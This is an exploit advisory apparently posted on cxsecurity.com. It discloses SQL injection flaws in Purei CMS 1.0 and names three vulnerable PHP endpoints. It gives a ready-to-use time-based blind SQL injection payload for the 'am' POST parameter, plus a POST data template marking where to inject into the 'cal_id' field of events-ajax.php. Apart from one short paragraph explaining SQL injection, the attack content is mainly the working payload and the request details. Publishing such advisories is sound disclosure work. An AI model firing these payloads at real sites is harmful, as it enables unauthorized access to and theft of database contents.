Purei CMS 1.0 SQL Injection

2024.03.30
Credit: Number 7
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Purei CMS 1.0 - SQL Injection # Date: [27-03-2024] # Exploit Author: [Number 7] # Vendor Homepage: [purei.com] # Version: [1.0] # Tested on: [Linux] ____________________________________________________________________________________ Introduction: An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters. This could jeopardize the integrity of your database or reveal sensitive information. ____________________________________________________________________________________ Time-Based Blind SQL Injection: Vulnerable files: http://localhost/includes/getAllParks.php http://localhost/includes/getSearchMap.php make a POST request with the value of the am input set to : if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ make sure to url encode the inputs. SQL injection: Method: POST REQUEST Vunerable file: /includes/events-ajax.php?action=getMonth data for the POST req: month=3&type=&year=2024&cal_id=1[Inject Here]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top